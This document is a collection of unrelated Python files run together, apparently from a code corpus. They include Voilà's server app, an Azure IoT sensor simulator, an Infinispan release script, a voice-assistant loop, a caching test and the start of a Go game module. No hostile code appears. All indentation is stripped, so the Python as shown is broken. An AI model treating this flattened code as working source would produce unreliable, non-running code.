def startIndexingServer(port):
print("[STARTING] Indexing Server is starting")
port = int(port)
localhost = socket.gethostbyname(socket.gethostname())
hosting_addr = (localhost, port)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(hosting_addr)
server.listen()
print(f"[LISTENING] Indexing Server is listening on {localhost}:{port}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=clientHandler, args=(conn, addr))
thread.daemon = True
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")
if __name__ == "__main__":
try:
startIndexingServer()
except KeyboardInterrupt:
print("\n[SHUTDOWN] Indexing server is down")
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
app.py
|
#############################################################################
# Copyright (c) 2018, Voilà Contributors #
# Copyright (c) 2018, QuantStack #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
import gettext
import io
import sys
import json
import logging
import threading
import tempfile
import os
import shutil
import signal
import socket
import webbrowser
import errno
import random
try:
from urllib.parse import urljoin
from urllib.request import pathname2url
except ImportError:
from urllib import pathname2url
from urlparse import urljoin
import jinja2
import tornado.ioloop
import tornado.web
from traitlets.config.application import Application
from traitlets.config.loader import Config
from traitlets import Unicode, Integer, Bool, Dict, List, default
from jupyter_server.services.kernels.handlers import KernelHandler, ZMQChannelsHandler
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.base.handlers import FileFindHandler, path_regex
from jupyter_server.config_manager import recursive_update
from jupyter_server.utils import url_path_join, run_sync
from jupyter_server.services.config import ConfigManager
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_core.paths import jupyter_config_path, jupyter_path
from ipython_genutils.py3compat import getcwd
from .paths import ROOT, STATIC_ROOT, collect_template_paths, collect_static_paths
from .handler import VoilaHandler
from .treehandler import VoilaTreeHandler
from ._version import __version__
from .static_file_handler import MultiStaticFileHandler, TemplateStaticFileHandler, WhiteListFileHandler
from .configuration import VoilaConfiguration
from .execute import VoilaExecutor
from .exporter import VoilaExporter
from .shutdown_kernel_handler import VoilaShutdownKernelHandler
from .voila_kernel_manager import voila_kernel_manager_factory
from .query_parameters_handler import QueryStringSocketHandler
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
def _(x):
return x
class Voila(Application):
name = 'voila'
version = __version__
examples = 'voila example.ipynb --port 8888'
flags = {
'debug': (
{
'Voila': {'log_level': logging.DEBUG},
'VoilaConfiguration': {'show_tracebacks': True},
},
_("Set the log level to logging.DEBUG, and show exception tracebacks in output.")
),
'no-browser': ({'Voila': {'open_browser': False}}, _('Don\'t open the notebook in a browser after startup.'))
}
description = Unicode(
"""voila [OPTIONS] NOTEBOOK_FILENAME
This launches a stand-alone server for read-only notebooks.
"""
)
option_description = Unicode(
"""
notebook_path:
File name of the Jupyter notebook to display.
"""
)
notebook_filename = Unicode()
port = Integer(
8866,
config=True,
help=_(
'Port of the Voilà server. Default 8866.'
)
)
autoreload = Bool(
False,
config=True,
help=_(
'Will autoreload the server and the page when a template, js file or Python code changes'
)
)
root_dir = Unicode(config=True, help=_('The directory to use for notebooks.'))
static_root = Unicode(
STATIC_ROOT,
config=True,
help=_(
'Directory holding static assets (HTML, JS and CSS files).'
)
)
aliases = {
'port': 'Voila.port',
'static': 'Voila.static_root',
'strip_sources': 'VoilaConfiguration.strip_sources',
'autoreload': 'Voila.autoreload',
'template': 'VoilaConfiguration.template',
'theme': 'VoilaConfiguration.theme',
'base_url': 'Voila.base_url',
'server_url': 'Voila.server_url',
'enable_nbextensions': 'VoilaConfiguration.enable_nbextensions',
'show_tracebacks': 'VoilaConfiguration.show_tracebacks',
'preheat_kernel': 'VoilaConfiguration.preheat_kernel',
'pool_size': 'VoilaConfiguration.default_pool_size'
}
classes = [
VoilaConfiguration,
VoilaExecutor,
VoilaExporter
]
connection_dir_root = Unicode(
config=True,
help=_(
'Location of temporary connection files. Defaults '
'to system `tempfile.gettempdir()` value.'
)
)
connection_dir = Unicode()
base_url = Unicode(
'/',
config=True,
help=_(
'Path for Voilà API calls. If server_url is unset, this will be \
used for both the base route of the server and the client. \
If server_url is set, the server will serve the routes prefixed \
by server_url, while the client will prefix its requests with base_url (this is \
useful in reverse proxies).'
)
)
server_url = Unicode(
None,
config=True,
allow_none=True,
help=_(
'Path to prefix to Voilà API handlers. Leave unset to default to base_url'
)
)
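# Illustrative example (added for clarity, not part of the original source):
# behind a reverse proxy that strips a '/dashboard' prefix before forwarding,
# one might run
#   voila notebook.ipynb --Voila.base_url=/dashboard/ --Voila.server_url=/
# so that the client prefixes its requests with base_url while the server
# itself serves the unprefixed routes, as described in the help strings above.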
notebook_path = Unicode(
None,
config=True,
allow_none=True,
help=_(
'path to notebook to serve with Voilà'
)
)
template_paths = List(
[],
config=True,
help=_(
'path to jinja2 templates'
)
)
static_paths = List(
[STATIC_ROOT],
config=True,
help=_(
'paths to static assets'
)
)
port_retries = Integer(50, config=True,
help=_("The number of additional ports to try if the specified port is not available.")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on."))
open_browser = Bool(True, config=True,
help=_("""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
"""))
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example)."""))
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._url(ip)
# TODO: do we want to have the token?
# if self.token:
# # Don't log full token if it came from config
# token = self.token if self._token_generated else '...'
# url = (url_concat(url, {'token': token})
# + '\n or '
# + url_concat(self._url('127.0.0.1'), {'token': token}))
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
# TODO: https / certfile
# proto = 'https' if self.certfile else 'http'
proto = 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
config_file_paths = List(
Unicode(),
config=True,
help=_(
'Paths to search for voila.(py|json)'
)
)
tornado_settings = Dict(
{},
config=True,
help=_(
'Extra settings to apply to tornado application, e.g. headers, ssl, etc'
)
)
@default('config_file_paths')
def _config_file_paths_default(self):
return [os.getcwd()] + jupyter_config_path()
@default('connection_dir_root')
def _default_connection_dir(self):
connection_dir = tempfile.gettempdir()
self.log.info('Using %s to store connection files' % connection_dir)
return connection_dir
@default('log_level')
def _default_log_level(self):
return logging.INFO
# similar to NotebookApp, except no extra path
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
@default('root_dir')
def _default_root_dir(self):
if self.notebook_path:
return os.path.dirname(os.path.abspath(self.notebook_path))
else:
return getcwd()
def _init_asyncio_patch(self):
"""set default asyncio policy to be compatible with tornado
Tornado 6 (at least) is not compatible with the default
asyncio implementation on Windows
Pick the older SelectorEventLoopPolicy on Windows
if the known-incompatible default policy is in use.
do this as early as possible to make it a low priority and overridable
ref: https://github.com/tornadoweb/tornado/issues/2608
FIXME: if/when tornado supports the defaults in asyncio,
remove and bump tornado requirement for py38
"""
if sys.platform.startswith("win") and sys.version_info >= (3, 8):
import asyncio
try:
from asyncio import (
WindowsProactorEventLoopPolicy,
WindowsSelectorEventLoopPolicy,
)
except ImportError:
pass
# not affected
else:
if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
def initialize(self, argv=None):
self._init_asyncio_patch()
self.log.debug("Searching path %s for config files", self.config_file_paths)
# to make config_file_paths settable via cmd line, we first need to parse it
super(Voila, self).initialize(argv)
if len(self.extra_args) == 1:
arg = self.extra_args[0]
# I am not sure why we need to check if self.notebook_path is set, can we get rid of this?
if not self.notebook_path:
if os.path.isdir(arg):
self.root_dir = arg
elif os.path.isfile(arg):
self.notebook_path = arg
else:
raise ValueError('argument is neither a file nor a directory: %r' % arg)
elif len(self.extra_args) != 0:
raise ValueError('provided more than 1 argument: %r' % self.extra_args)
# then we load the config
self.load_config_file('voila', path=self.config_file_paths)
# common configuration options between the server extension and the application
self.voila_configuration = VoilaConfiguration(parent=self)
self.setup_template_dirs()
signal.signal(signal.SIGTERM, self._handle_signal_stop)
def setup_template_dirs(self):
if self.voila_configuration.template:
template_name = self.voila_configuration.template
self.template_paths = collect_template_paths(['voila', 'nbconvert'], template_name, prune=True)
self.static_paths = collect_static_paths(['voila', 'nbconvert'], template_name)
conf_paths = [os.path.join(d, 'conf.json') for d in self.template_paths]
for p in conf_paths:
# see if config file exists
if os.path.exists(p):
# load the template-related config
with open(p) as json_file:
conf = json.load(json_file)
# update the overall config with it, preserving CLI config priority
if 'traitlet_configuration' in conf:
recursive_update(conf['traitlet_configuration'], self.voila_configuration.config.VoilaConfiguration)
# pass merged config to overall Voilà config
self.voila_configuration.config.VoilaConfiguration = Config(conf['traitlet_configuration'])
self.log.debug('using template: %s', self.voila_configuration.template)
self.log.debug('template paths:\n\t%s', '\n\t'.join(self.template_paths))
self.log.debug('static paths:\n\t%s', '\n\t'.join(self.static_paths))
if self.notebook_path and not os.path.exists(self.notebook_path):
raise ValueError('Notebook not found: %s' % self.notebook_path)
def _handle_signal_stop(self, sig, frame):
self.log.info('Handle signal %s.' % sig)
self.ioloop.add_callback_from_signal(self.ioloop.stop)
def start(self):
self.connection_dir = tempfile.mkdtemp(
prefix='voila_',
dir=self.connection_dir_root
)
self.log.info('Storing connection files in %s.' % self.connection_dir)
self.log.info('Serving static files from %s.' % self.static_root)
self.kernel_spec_manager = KernelSpecManager(
parent=self
)
# we create a config manager that load both the serverconfig and nbconfig (classical notebook)
read_config_path = [os.path.join(p, 'serverconfig') for p in jupyter_config_path()]
read_config_path += [os.path.join(p, 'nbconfig') for p in jupyter_config_path()]
self.config_manager = ConfigManager(parent=self, read_config_path=read_config_path)
self.contents_manager = LargeFileManager(parent=self)
preheat_kernel: bool = self.voila_configuration.preheat_kernel
pool_size: int = self.voila_configuration.default_pool_size
kernel_manager_class = voila_kernel_manager_factory(
self.voila_configuration.multi_kernel_manager_class,
preheat_kernel,
pool_size
)
self.kernel_manager = kernel_manager_class(
parent=self,
connection_dir=self.connection_dir,
kernel_spec_manager=self.kernel_spec_manager,
allowed_message_types=[
'comm_open',
'comm_close',
'comm_msg',
'comm_info_request',
'kernel_info_request',
'shutdown_request'
]
)
jenv_opt = {"autoescape": True} # we might want extra options via cmd line like notebook server
env = jinja2.Environment(loader=jinja2.FileSystemLoader(self.template_paths), extensions=['jinja2.ext.i18n'], **jenv_opt)
nbui = gettext.translation('nbui', localedir=os.path.join(ROOT, 'i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
# default server_url to base_url
self.server_url = self.server_url or self.base_url
self.app = tornado.web.Application(
base_url=self.base_url,
server_url=self.server_url or self.base_url,
kernel_manager=self.kernel_manager,
kernel_spec_manager=self.kernel_spec_manager,
allow_remote_access=True,
autoreload=self.autoreload,
voila_jinja2_env=env,
jinja2_env=env,
static_path='/',
server_root_dir='/',
contents_manager=self.contents_manager,
config_manager=self.config_manager
)
self.app.settings.update(self.tornado_settings)
handlers = []
handlers.extend([
(url_path_join(self.server_url, r'/api/kernels/%s' % _kernel_id_regex), KernelHandler),
(url_path_join(self.server_url, r'/api/kernels/%s/channels' % _kernel_id_regex), ZMQChannelsHandler),
(
url_path_join(self.server_url, r'/voila/templates/(.*)'),
TemplateStaticFileHandler
),
(
url_path_join(self.server_url, r'/voila/static/(.*)'),
MultiStaticFileHandler,
{
'paths': self.static_paths,
'default_filename': 'index.html'
},
),
(url_path_join(self.server_url, r'/voila/api/shutdown/(.*)'), VoilaShutdownKernelHandler)
])
if preheat_kernel:
handlers.append(
(
url_path_join(self.server_url, r'/voila/query/%s' % _kernel_id_regex),
QueryStringSocketHandler
)
)
# Serving notebook extensions
if self.voila_configuration.enable_nbextensions:
handlers.append(
(
url_path_join(self.server_url, r'/voila/nbextensions/(.*)'),
FileFindHandler,
{
'path': self.nbextensions_path,
'no_cache_paths': ['/'], # don't cache anything in nbextensions
},
)
)
handlers.append(
(
url_path_join(self.server_url, r'/voila/files/(.*)'),
WhiteListFileHandler,
{
'whitelist': self.voila_configuration.file_whitelist,
'blacklist': self.voila_configuration.file_blacklist,
'path': self.root_dir,
},
)
)
tree_handler_conf = {
'voila_configuration': self.voila_configuration
}
if self.notebook_path:
handlers.append((
url_path_join(self.server_url, r'/(.*)'),
VoilaHandler,
{
'notebook_path': os.path.relpath(self.notebook_path, self.root_dir),
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}
))
else:
self.log.debug('serving directory: %r', self.root_dir)
handlers.extend([
(self.server_url, VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/tree' + path_regex),
VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/render/(.*)'),
VoilaHandler,
{
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}),
])
self.app.add_handlers('.*$', handlers)
self.listen()
def stop(self):
shutil.rmtree(self.connection_dir)
run_sync(self.kernel_manager.shutdown_all())
def random_ports(self, port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
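# Worked example (added for clarity, not in the original source): with the
# default port=8866 and port_retries=50, listen() below calls
# random_ports(8866, 51), which yields the sequential ports 8866..8870 first
# and then 46 ports drawn uniformly from [max(1, 8866 - 102), 8866 + 102].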
def listen(self):
success = False
for port in self.random_ports(self.port, self.port_retries+1):
try:
self.app.listen(port)
self.port = port
self.log.info('Voilà is running at:\n%s' % self.display_url)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info(_('The port %i is already in use, trying another port.') % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning(_("Permission to listen on port %i denied") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical(_('ERROR: the Voilà server could not be started because '
'no available port could be found.'))
self.exit(1)
if self.open_browser:
self.launch_browser()
self.ioloop = tornado.ioloop.IOLoop.current()
try:
self.ioloop.start()
except KeyboardInterrupt:
self.log.info('Stopping...')
finally:
self.stop()
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
uri = self.base_url
fd, open_file = tempfile.mkstemp(suffix='.html')
# Write a temporary file to open in the browser
with io.open(fd, 'w', encoding='utf-8') as fh:
# TODO: do we want to have the token?
# if self.token:
# url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, uri)
jinja2_env = self.app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url, base_url=url))
def target():
return browser.open(urljoin('file:', pathname2url(open_file)), new=self.webbrowser_open_new)
threading.Thread(target=target).start()
main = Voila.launch_instance
|
iot-hub-client-dual.py
|
import json
import random
import re
import sys
import threading
import time
from azure.iot.device import IoTHubDeviceClient, Message
AUX_CONNECTION_STRING = sys.argv[1]
DEVICE_NAME=AUX_CONNECTION_STRING.split(";")[1].split("=")[1]
AUX_BASE_HEART_RATE = 65
AUX_BASE_BODY_TEMPERATURE = 37.0
AUX_MAXIMUM_BODY_TEMPERATURE = 40.0
#SENSOR DATA WILL HOST SENSOR METRICS
sensor_data = {}
#METHOD FOR ONE METRIC
def get_sensor_temperature():
temperature = AUX_BASE_BODY_TEMPERATURE + (random.random() * random.random() * 5)
return temperature
#METHOD FOR ONE METRIC
def get_sensor_heart_rate():
heart_rate = AUX_BASE_HEART_RATE + (random.random() * random.random() * 15)
return heart_rate
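#ILLUSTRATIVE SKETCH (NOT PART OF THE ORIGINAL SAMPLE): A NEW METRIC FOLLOWS THE
#SAME PATTERN AS THE TWO METHODS ABOVE, E.G. A HYPOTHETICAL OXYGEN SATURATION SENSOR:
#
#def get_sensor_oxygen_saturation():
#    return 94.0 + (random.random() * random.random() * 5)
#
#AND IN THE MAIN LOOP BELOW: sensor_data['oxygen_saturation'] = get_sensor_oxygen_saturation()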
def aux_validate_connection_string():
if not AUX_CONNECTION_STRING.startswith( 'HostName=' ):
print ("ERROR - YOUR IoT HUB CONNECTION STRING IS NOT VALID")
print ("FORMAT - HostName=your_iot_hub_name.azure-devices.net;DeviceId=your_device_name;SharedAccessKey=your_shared_access_key")
sys.exit()
def message_listener(client):
while True:
message = client.receive_message()
print("Message received")
print( " Data: {}".format( message.data.decode("utf-8") ) )
print( " Properties: {}".format(message.custom_properties))
def aux_iothub_client_init():
client = IoTHubDeviceClient.create_from_connection_string(AUX_CONNECTION_STRING)
return client
def iothub_client_telemetry_sample_run():
try:
aux_validate_connection_string()
client = aux_iothub_client_init()
print ( "IoT Hub Simulated body sensor" )
print ( "Press Ctrl-C to exit" )
#ENABLE THE RECEPTION THREAD, DEFINING THE TARGET METHOD
message_listener_thread = threading.Thread(target=message_listener, args=(client,))
message_listener_thread.daemon = True
message_listener_thread.start()
#IT WILL RUN FOREVER UNLESS YOU STOP IT
while True:
#COLLECTING SENSOR VALUES
#NEW METRIC COLLECTION SHOULD ADD CODE HERE
temperature_measure = get_sensor_temperature()
heart_rate_measure = get_sensor_heart_rate()
sensor_data['device_name'] = DEVICE_NAME
#STORING SENSOR VALUES IN DATA STRUCTURE
#NEW METRIC COLLECTION SHOULD ADD CODE HERE
sensor_data['temperature'] = temperature_measure
sensor_data['heart_rate'] = heart_rate_measure
#TRANSFORMING IT TO JSON
json_sensor_data = json.dumps(sensor_data)
#CREATING AN AZURE IOT MESSAGE OBJECT
azure_iot_message = Message(json_sensor_data)
#ADDING A CUSTOM PROPERTY OF OUR CHOICE TO THE MESSAGE CALLED temperature_alert
if temperature_measure > AUX_MAXIMUM_BODY_TEMPERATURE:
azure_iot_message.custom_properties["temperature_alert"] = "true"
else:
azure_iot_message.custom_properties["temperature_alert"] = "false"
#SETTING PROPER MESSAGE ENCODING
azure_iot_message.content_encoding='utf-8'
azure_iot_message.content_type='application/json'
#SENDING THE MESSAGE
print( "Sending azure_iot_message: {}".format(azure_iot_message) )
client.send_message(azure_iot_message)
print ( "Message successfully sent" )
#SLEEPING FOR A SECOND BEFORE RESTARTING
time.sleep(1)
except KeyboardInterrupt:
print ( "IoTHubClient sample stopped" )
if __name__ == '__main__':
iothub_client_telemetry_sample_run()
|
release.py
|
#!/usr/bin/python
import re
import sys
import os
import os.path
import subprocess
import shutil
import tempfile
from datetime import *
from multiprocessing import Process
from utils import *
try:
from xml.etree.ElementTree import ElementTree
except:
prettyprint('''
Welcome to the Infinispan Release Script.
This release script requires that you use at least Python 2.5.0. It appears
that you do not have the ElementTree XML APIs available, which are available
by default in Python 2.5.0.
''', Levels.FATAL)
sys.exit(1)
modules = []
uploader = None
git = None
def help_and_exit():
prettyprint('''
Welcome to the Infinispan Release Script.
%s Usage:%s
$ bin/release.py <version> <branch to tag from> <--mvn-only>
%s E.g.,%s
$ bin/release.py 6.1.1.Beta1 %s<-- this will tag off master.%s
$ bin/release.py 6.1.1.Beta1 6.1.x %s<-- this will use the appropriate branch.%s
$ bin/release.py 6.1.1.Beta1 6.1.x --mvn-only %s<-- this will only tag and release to maven (no distribution).%s
''' % (Colors.yellow(), Colors.end_color(), Colors.yellow(), Colors.end_color(), Colors.green(), Colors.end_color(), Colors.green(), Colors.end_color(), Colors.green(), Colors.end_color()), Levels.INFO)
sys.exit(0)
def validate_version(version):
version_pattern = get_version_pattern()
if version_pattern.match(version):
return version.strip()
else:
prettyprint("Invalid version '"+version+"'!\n", Levels.FATAL)
help_and_exit()
def tag_release(version, branch):
if git.remote_branch_exists():
git.switch_to_branch()
git.create_tag_branch()
else:
prettyprint("Branch %s cannot be found on upstream repository. Aborting!" % branch, Levels.FATAL)
sys.exit(100)
def get_project_version_tag(tree):
return tree.find("./{%s}version" % (maven_pom_xml_namespace))
def get_parent_version_tag(tree):
return tree.find("./{%s}parent/{%s}version" % (maven_pom_xml_namespace, maven_pom_xml_namespace))
def get_properties_version_tag(tree):
return tree.find("./{%s}properties/{%s}project-version" % (maven_pom_xml_namespace, maven_pom_xml_namespace))
def write_pom(tree, pom_file):
tree.write("tmp.xml", 'UTF-8')
in_f = open("tmp.xml")
out_f = open(pom_file, "w")
try:
for l in in_f:
newstr = l.replace("ns0:", "").replace(":ns0", "").replace("ns1", "xsi")
out_f.write(newstr)
finally:
in_f.close()
out_f.close()
os.remove("tmp.xml")
if settings['verbose']:
prettyprint(" ... updated %s" % pom_file, Levels.INFO)
def patch(pom_file, version):
'''Updates the version in a POM file. We need to locate //project/parent/version, //project/version and
//project/properties/project-version and replace the contents of these with the new version'''
if settings['verbose']:
prettyprint("Patching %s" % pom_file, Levels.DEBUG)
tree = ElementTree()
tree.parse(pom_file)
need_to_write = False
tags = []
tags.append(get_parent_version_tag(tree))
tags.append(get_project_version_tag(tree))
tags.append(get_properties_version_tag(tree))
for tag in tags:
if tag != None and "-SNAPSHOT" in tag.text:
if settings['verbose']:
prettyprint("%s is %s. Setting to %s" % (str(tag), tag.text, version), Levels.DEBUG)
tag.text=version
need_to_write = True
if need_to_write:
# write to file again!
write_pom(tree, pom_file)
return True
else:
if settings['verbose']:
prettyprint("File doesn't need updating; nothing replaced!", Levels.DEBUG)
return False
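# Illustrative sketch (not from the original script) of the three version tags
# that patch() rewrites in a pom.xml; artifact contents are placeholders only:
#
#   <project xmlns="http://maven.apache.org/POM/4.0.0">
#     <parent><version>6.1.1-SNAPSHOT</version></parent>      <!-- //project/parent/version -->
#     <version>6.1.1-SNAPSHOT</version>                       <!-- //project/version -->
#     <properties><project-version>6.1.1-SNAPSHOT</project-version></properties>
#   </project>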
def get_poms_to_patch(working_dir):
poms_to_patch = [working_dir + "/pom.xml"]
return poms_to_patch
def update_versions(base_dir, version):
os.chdir(base_dir)
poms_to_patch = get_poms_to_patch(".")
modified_files = []
for pom in poms_to_patch:
if patch(pom, version):
modified_files.append(pom)
pieces = re.compile(r'[\.\-]').split(version)
snapshot = pieces[3]=='SNAPSHOT'
final = pieces[3]=='Final'
# Now make sure this goes back into the repository.
git.commit(modified_files, "'Release Script: update versions for %s'" % version)
# And return the next version
if final:
return pieces[0] + '.' + pieces[1] + '.' + str(int(pieces[2])+ 1) + '-SNAPSHOT'
else:
return None
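# Worked example (added for clarity, not in the original script): for
# version='6.1.2.Final' the split above yields ['6', '1', '2', 'Final'], so
# update_versions() returns '6.1.3-SNAPSHOT' as the next development version;
# for a non-Final version such as '6.1.2.Beta1' it returns None.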
def get_module_name(pom_file):
tree = ElementTree()
tree.parse(pom_file)
return tree.findtext("./{%s}artifactId" % maven_pom_xml_namespace)
def do_task(target, args, async_processes):
if settings['multi_threaded']:
async_processes.append(Process(target = target, args = args))
else:
target(*args)
### This is the starting place for this script.
def release():
global settings
global uploader
global git
assert_python_minimum_version(2, 5)
require_settings_file()
# We start by determining whether the version passed in is a valid one
if len(sys.argv) < 2:
help_and_exit()
base_dir = os.getcwd()
version = validate_version(sys.argv[1])
branch = "master"
mvn_only = False
if len(sys.argv) > 2:
if sys.argv[2].startswith("--mvn-only"):
mvn_only = True
else:
branch = sys.argv[2]
if len(sys.argv) > 3:
if sys.argv[3].startswith("--mvn-only"):
mvn_only = True
else:
prettyprint("Unknown argument %s" % sys.argv[3], Levels.WARNING)
help_and_exit()
prettyprint("Releasing Infinispan Cloud CacheStore version %s from branch '%s'" % (version, branch), Levels.INFO)
sure = input_with_default("Are you sure you want to continue?", "N")
if not sure.upper().startswith("Y"):
prettyprint("... User Abort!", Levels.WARNING)
sys.exit(1)
prettyprint("OK, releasing! Please stand by ...", Levels.INFO)
## Set up network interactive tools
if settings['dry_run']:
# Use stubs
prettyprint("*** This is a DRY RUN. No changes will be committed. Used to test this release script only. ***", Levels.DEBUG)
prettyprint("Your settings are %s" % settings, Levels.DEBUG)
uploader = DryRunUploader()
else:
uploader = Uploader()
git = Git(branch, version)
if not git.is_upstream_clone():
proceed = input_with_default('This is not a clone of an %supstream%s Infinispan Cloud CacheStore repository! Are you sure you want to proceed?' % (Colors.UNDERLINE, Colors.END), 'N')
if not proceed.upper().startswith('Y'):
prettyprint("... User Abort!", Levels.WARNING)
sys.exit(1)
## Make sure we don't include un-needed content in the release
prettyprint("Step 1: Cleaning up working directory (un-tracked and modified files)", Levels.INFO)
git.clean_release_directory()
prettyprint("Step 1: Complete", Levels.INFO)
## Release order:
# Step 1: Tag in Git
prettyprint("Step 2: Tagging %s in git as %s" % (branch, version), Levels.INFO)
tag_release(version, branch)
prettyprint("Step 2: Complete", Levels.INFO)
# Step 2: Update version in tagged files
prettyprint("Step 3: Updating version number in source files", Levels.INFO)
version_next = update_versions(base_dir, version)
prettyprint("Step 3: Complete", Levels.INFO)
# Step 3: Build and test in Maven
prettyprint("Step 4: Build and test in Maven", Levels.INFO)
maven_build_distribution(version)
prettyprint("Step 4: Complete", Levels.INFO)
## Tag the release
git.tag_for_release()
step_no=5
# Switch back to the branch being released
git.switch_to_branch()
# Update to next version
if version_next is not None:
prettyprint("Step %s: Updating version number for next release" % step_no, Levels.INFO)
update_versions(base_dir, version_next)
prettyprint("Step %s: Complete" % step_no, Levels.INFO)
if not settings['dry_run']:
git.push_tag_to_origin()
if version_next is not None:
git.push_branch_to_origin()
git.cleanup()
else:
prettyprint("In dry-run mode. Not pushing tag to remote origin and not removing temp release branch %s." % git.working_branch, Levels.DEBUG)
prettyprint("\n\n\nDone!", Levels.INFO)
if __name__ == "__main__":
release()
|
main.py
|
from utils import *
from process import *
from server import run_server
import multiprocessing,requests
p = multiprocessing.Process(target=run_server, args=())
p.daemon = True
path_volume= abspath(__file__)+"_data/"
keyword= "ok assistant"
list_stop= get_tree_by_tag("start>stop")['keywords']
volumes={str(path_volume):{'bind': '/volume', 'mode': 'rw'}}
DEFAULT_HOST= "127.0.0.1"
DEFAULT_PORT= "5000"
def url(route="",host=DEFAULT_HOST,port=DEFAULT_PORT):
return 'http://'+host+':'+port+'/'+route
if __name__ == '__main__':
show= True
p.start()
while True:
if show:
print("\nJe suis votre assistant, dites: \n[\"ok assistant\"] pour m'appeler \n[\"quitter\"] pour quitter")
show= False
speech= speech_to_text("False")
if speech:
if keyword in speech:
show= True
if auth():
Tree()
else:
text_to_speech("l'authentification a échouée")
else:
stop= False
for word in list_stop:
if word in speech:
stop= True
if stop:
print("Fin de programme...")
break
p.terminate()
|
test_process.py
|
import multiprocessing as mp
from jitcache import Cache
import time
cache = Cache()
@cache.memoize
def slow_fn(input_1, input_2):
print("Slow Function Called")
time.sleep(1)
return input_1 * input_2
def test_process():
kwarg_dict = {"input_1": 10, "input_2": 4}
n_processes = 10
process_list = []
# Create a set of processes that will all request the same value
for i in range(n_processes):
p = mp.Process(target=slow_fn, kwargs=kwarg_dict)
process_list.append(p)
# Start each process
for p in process_list:
p.start()
# Wait for completion
for p in process_list:
p.join()
# Verify the value they computed; this call should be served from the cache
assert slow_fn(**kwarg_dict) == 40
|
game.py
|
import copy
import math
import os
import re
import threading
from datetime import datetime
from typing import Dict, List, Optional, Union
from kivy.clock import Clock
from katrain.core.constants import (
ANALYSIS_FORMAT_VERSION,
OUTPUT_DEBUG,
OUTPUT_INFO,
PLAYER_AI,
PLAYER_HUMAN,
PROGRAM_NAME,
SGF_INTERNAL_COMMENTS_MARKER,
STATUS_ANALYSIS,
STATUS_ERROR,
STATUS_INFO,
STATUS_TEACHING,
)
from katrain.core.engine import KataGoEngine
from katrain.core.game_node import GameNode
from katrain.core.lang import i18n, rank_label
from katrain.core.sgf_parser import SGF, Move
from katrain.core.utils import var_to_grid
class IllegalMoveException(Exception):
pass
class KaTrainSGF(SGF):
_NODE_CLASS = GameNode
class Game:
"""Represents a game of go, including an implementation of capture rules."""
DEFAULT_PROPERTIES = {"GM": 1, "FF": 4}
def __init__(
self,
katrain,
engine: Union[Dict, KataGoEngine],
move_tree: GameNode = None,
analyze_fast=False,
game_properties: Optional[Dict] = None,
sgf_filename=None,
):
self.katrain = katrain
self._lock = threading.Lock()
if not isinstance(engine, Dict):
engine = {"B": engine, "W": engine}
self.engines = engine
self.game_id = datetime.strftime(datetime.now(), "%Y-%m-%d %H %M %S")
self.sgf_filename = sgf_filename
self.insert_mode = False
self.insert_after = None
self.region_of_interest = None
self.external_game = False # not generated by katrain at some point
if move_tree:
self.root = move_tree
self.external_game = PROGRAM_NAME not in self.root.get_property("AP", "")
